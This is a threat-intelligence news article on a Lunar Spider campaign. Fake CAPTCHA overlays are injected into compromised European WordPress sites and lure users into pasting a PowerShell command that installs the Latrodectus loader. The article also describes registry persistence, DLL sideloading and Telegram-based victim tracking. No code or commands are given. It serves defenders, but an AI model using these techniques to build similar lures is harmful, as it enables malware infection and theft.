What CAPTCHA Hides: New Attack Turns Verification Tool into Spy Instrument
New deception mechanism is already active on hundreds of sites.
New deception mechanism is already active on hundreds of sites.
The Lunar Spider group, also known as Gold Swath and Elara, has activated a new malicious campaign that uses a fake CAPTCHA verification interface to infect devices. The primary method of initial access was the compromise of vulnerable websites in Europe through misconfigured CORS (Cross-Origin Resource Sharing) policy. The attackers inject a JavaScript code called iFrameOverload into the compromised resources, which overlays a fake CAPTCHA page called TeleCaptcha on top of the site's content and begins tracking user activity.
The pseudo-interface doesn't just mimic the verification process; it forces the victim to copy a generated command to the clipboard. This string includes a PowerShell command to download an MSI file, which contains an Intel executable and a malicious Latrodectus DLL. Upon execution, the EXE file registers itself for autorun via the Windows Registry Run key, and upon the next system start, it loads the DLL using DLL search order hijacking. The DLL itself is signed, but its certificate was subsequently revoked.
The Latrodectus DLL, version 2.3, establishes communication with the command-and-control (C2) server and executes various commands for information gathering. The component's configuration indicates support for RC4 encryption, numerous built-in scripts for collecting network and system data, and the ability to download additional malicious components.
Its functionality includes querying trust domains, viewing user groups, checking for the presence of antivirus software, querying the registry, and other actions typical of preparing for a follow-up attack—in particular, for ransomware distribution, with which Lunar Spider, according to previous data, maintains cooperation.
In addition to the download and installation, TeleCaptcha actively monitors the victim's clicks and sends notifications to the attackers' Telegram channel. User IDs are generated based on random combinations of adjectives and animal names and are stored in localStorage to track repeated activity. The operators show particular interest in Windows users—additional messages are sent regarding their actions, including prompts for the operator to check the malicious infrastructure's control panel.
The infrastructure used in this campaign includes domains based on AWS, Cloudflare, and Railnet. They are registered primarily through Asian registrars and are used for different stages of the attack—from hosting the JavaScript and fake CAPTCHA to hosting the payload and C2 servers. Most of the websites used for the initial compromise are built on WordPress and are vulnerable to attacks due to incorrect CORS settings.
Analysis of the discovered MSI files shows that they were built using Advanced Installer, and during the installation process, they unpack a CAB archive containing the executable and supporting libraries. The launch occurs without displaying windows, with automatic acceptance of terms, and installation details are logged. To ensure persistence and stealth, well-known techniques are used, including autorun via the registry and DLL sideloading into a legitimate Intel executable file.
This approach is a continuation of a strategy that began during the active distribution of IcedID. After the infrastructure of that malware platform was dismantled during Operation Endgame, Lunar Spider shifted to Latrodectus, maintaining the MaaS (Malware-as-a-Service) and initial access broker models. Given the rich toolkit and activity in Europe, particularly in Germany, this campaign poses a significant risk to the corporate sector, especially in the financial industry.
